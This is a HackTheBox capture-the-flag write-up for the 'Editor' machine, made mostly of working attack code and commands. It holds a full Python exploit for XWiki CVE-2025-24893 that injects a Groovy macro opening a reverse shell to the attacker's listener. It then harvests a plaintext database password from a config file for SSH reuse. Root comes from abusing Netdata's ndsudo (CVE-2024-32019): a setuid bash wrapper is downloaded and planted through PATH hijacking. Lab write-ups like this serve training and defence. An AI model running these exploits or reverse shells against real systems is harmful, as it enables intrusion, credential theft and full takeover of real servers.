# Editor (Easy) – HackTheBox Writeup ## Overview - **Machine name:** Editor - **Difficulty:** Easy - **Attack box IP:** `10.10.14.134` - **Target IP:** `10.10.11.80` This writeup covers: 1. Enumeration 2. Initial Access (XWiki RCE) 3. User Escalation (SSH) 4. Privilege Escalation (SUID abuse) 5. Flags --- ## 1. Enumeration ### 1.1 Nmap Scan ```bash sudo nmap -p- --open -sS --min-rate 5000 -n -Pn 10.10.11.80 -vvv ``` Revealed open ports: ``` 22/tcp open ssh 80/tcp open http 8080/tcp open http-proxy ``` ### 1.2 Virtual Host Discovery Mapped `editor.htb` to `10.10.11.80` in `/etc/hosts`, then ran: ```bash ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt \ -H "Host: FUZZ.editor.htb" \ -u http://editor.htb -v ``` **Found:** `wiki.editor.htb` --- ## 2. Initial Access: XWiki RCE (CVE-2025-24893) The subdomain `wiki.editor.htb` ran XWiki. We leveraged the public [CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893) [exploit](https://raw.githubusercontent.com/a1baradi/Exploit/refs/heads/main/CVE-2025-24893.py). ### 2.1 Prepare Listener ```bash nc -lvnp 4444 ``` ### 2.2 Run Exploit Using the PoC script (modified for reverse shell): ```bash #!/usr/bin/env python3 import argparse, requests, urllib.parse, sys def detect_protocol(domain): for proto in ("https","http"): url = f"{proto}://{domain}" try: r = requests.get(url, timeout=5) if r.status_code < 400: return url except: pass sys.exit("Target unreachable") def build_payload(lhost, lport): cmd = ( "python3 -c 'import socket,subprocess,os;" f"s=socket.socket();s.connect((\"{lhost}\",{lport}));" "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);" "subprocess.call([\"/bin/sh\",\"-i\"])'" ) return cmd.replace("'", "\\'") def exploit(domain, lhost, lport): base = detect_protocol(domain) groovy = ( "new ProcessBuilder(['/bin/bash','-c','" + build_payload(lhost, lport) + "']).redirectErrorStream(true).start()" ) macro = ( "}}}{{async async=false}}{{groovy}}" + groovy + "{{/groovy}}{{/async}}" ) payload = urllib.parse.quote(macro, safe='') url = f"{base}/xwiki/bin/get/Main/SolrSearch?media=rss&text={payload}" print(f"[+] Exploiting → {url}") requests.get(url, timeout=10) if __name__ == "__main__": p = argparse.ArgumentParser() p.add_argument("domain"); p.add_argument("lhost"); p.add_argument("lport", type=int) args = p.parse_args() exploit(args.domain, args.lhost, args.lport) ``` Run: ```bash python3 exploit.py wiki.editor.htb 10.10.14.134 4444 ``` ### 2.3 Gain Shell Listener output: ``` connect to [10.10.14.134] from (UNKNOWN) [10.10.11.80] 58790 $ ``` Spawn a proper TTY: ```bash $ python3 -c "import pty; pty.spawn('/bin/bash')" xwiki@editor:/usr/lib/xwiki-jetty$ ``` --- ## 3. User Escalation: SSH as `oliver` ### 3.1 Harvest Credentials Extracted database password from XWiki config: ```bash cat /usr/lib/xwiki-jetty/WEB-INF/hibernate.cfg.xml | grep password ``` Noted password: `theEd1t0rTeam99` Also found local user: ``` oliver:x:1000:1000:,,,:/home/oliver:/bin/bash ``` ### 3.2 SSH Login ```bash ssh oliver@editor.htb # password: theEd1t0rTeam99 ``` --- ## 4. Privilege Escalation: SUID Netdata Plugin ### 4.1 Identify SUID Binaries ```bash find / -perm -4000 2>/dev/null ``` Notable SUID: ``` /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo ``` This matches [CVE-2024-32019](https://nvd.nist.gov/vuln/detail/CVE-2024-32019) bias: [`ndsudo` trusts its first argument as a plugin name](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93). ### 4.2 Build Malicious Wrapper On attack box, create `megacli.c`: ```c #include <unistd.h> #include <stdlib.h> int main() { setuid(0); setgid(0); execl("/bin/bash", "bash", "-i", NULL); return 0; } ``` Compile: ```bash gcc megacli.c -o megacli ``` ### 4.3 Host Malicious Binary ```bash python3 -m http.server 8000 ``` On target (SSH session): ```bash wget http://10.10.14.134:8000/megacli chmod +x megacli mkdir ~/fakebin && mv megacli ~/fakebin/ export PATH=~/fakebin:$PATH ``` ### 4.4 Exploit ndsudo ```bash /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo megacli-disk-info ``` Yields a root shell: ```bash root@editor:/home/oliver# id # uid=0(root) gid=0(root) ```